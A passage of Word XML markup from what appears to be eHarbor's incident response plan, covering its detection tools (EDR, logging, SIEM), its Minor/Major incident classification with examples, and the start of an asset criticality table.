            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62891FB9" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Kalle Kippari</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4192D96B" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>cutbin, 8chan, news</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39ABB636" w14:textId="77777777" w:rsidR="007B1F3A" w:rsidRPr="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
            <w:pPr>
              <w:keepNext/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B1F3A">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>WWW; Mail; Helpdesk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78CCC164" w14:textId="57D31C43" w:rsidR="00836A67" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005D5567">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Roles and responsibilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D46B46" w14:textId="067640B0" w:rsidR="007B1F3A" w:rsidRDefault="007B1F3A" w:rsidP="007B1F3A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc163900532"/>
      <w:r>
        <w:t>Incident identification</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="13F5EC6A" w14:textId="564AD069" w:rsidR="00D97E96" w:rsidRPr="008C5F51" w:rsidRDefault="00D97E96" w:rsidP="00D97E96">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">eHarbor has implemented detection technology throughout its IT infrastructure. The key solutions are: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7B6AC9" w14:textId="77777777" w:rsidR="00D97E96" w:rsidRPr="008C5F51" w:rsidRDefault="00D97E96" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">EDR software implemented on all servers and workstations. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BC776A" w14:textId="77777777" w:rsidR="00D97E96" w:rsidRPr="008C5F51" w:rsidRDefault="00D97E96" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Extensive logging gathered throughout the infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3DE18B" w14:textId="77777777" w:rsidR="00D97E96" w:rsidRPr="008C5F51" w:rsidRDefault="00D97E96" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM solution used to analyze the logs, and to raise potential security alerts detected from the logs.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230268A4" w14:textId="77777777" w:rsidR="00D97E96" w:rsidRPr="008C5F51" w:rsidRDefault="00D97E96" w:rsidP="00D97E96">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E751892" w14:textId="77777777" w:rsidR="00D97E96" w:rsidRDefault="00D97E96" w:rsidP="00D97E96">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>eHarbor employes both internal and external resources for monitoring the detection tools in use 24/7/365.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Furthermore, eHarbor actively monitors all communications channels and the operations of its IT infrastructure and services for any indicators of malicious activity. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62448095" w14:textId="4B165F98" w:rsidR="00D97E96" w:rsidRDefault="00D97E96" w:rsidP="00D97E96">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc163900533"/>
      <w:r>
        <w:t>Incident classification</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="6021010F" w14:textId="47B05950" w:rsidR="00344C3A" w:rsidRPr="008C5F51" w:rsidRDefault="00344C3A" w:rsidP="00344C3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">eHarbor classifies incidents either as </w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Minor</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Major</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> incidents. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0624434E" w14:textId="132E4F21" w:rsidR="00344C3A" w:rsidRDefault="00344C3A" w:rsidP="00344C3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Minor</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> incident is an incident that requires minor effort to analyze and remediate. Examples: leake</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> end user password but no successful sign ins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a network scan on DMZ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2883D9E6" w14:textId="0F7F1786" w:rsidR="00344C3A" w:rsidRPr="008C5F51" w:rsidRDefault="00344C3A" w:rsidP="00344C3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Major</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> incident is an incident that requires major effort to analyze, contain, remediate and recover fro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">m. </w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Examples: Malware on multiple workstations, malware on a server, malicious sign in with an administrative account. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654B0A25" w14:textId="77777777" w:rsidR="00344C3A" w:rsidRDefault="00344C3A" w:rsidP="00344C3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, incidents are prioritized based on the criticality of the asset. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Table 2 describes t</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>he criticality of eHarbor assets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-113" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="45B0E1"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="45B0E1"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="45B0E1"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="45B0E1"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="45B0E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="45B0E1"/>
        </w:tblBorders>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2370"/>
        <w:gridCol w:w="3068"/>
        <w:gridCol w:w="1530"/>
      </w:tblGrid>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="4FE6FAE9" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="156082"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="156082"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="156082"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="156082"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D9D21F4" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="156082"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="156082"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="156082"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="202C5A25" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="156082"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="156082"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="156082"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="156082"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="608B0260" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Criticality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="16B957A3" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B3494E8" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Firewall-dc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B41876F" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1E4F5"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BF5909A" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006016C4" w:rsidRPr="006016C4" w14:paraId="19CDDD1A" w14:textId="77777777" w:rsidTr="006016C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2370" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F63CD13" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Firewall-office</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3068" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12BF28F9" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006016C4">
              <w:rPr>
                <w:rFonts w:ascii="Aptos" w:eastAsia="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="fi-FI"/>
              </w:rPr>
              <w:t>Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A938E7B" w14:textId="77777777" w:rsidR="006016C4" w:rsidRPr="006016C4" w:rsidRDefault="006016C4" w:rsidP="006016C4">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1304"/>
                <w:tab w:val="left" w:pos="2608"/>
              </w:tabs>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
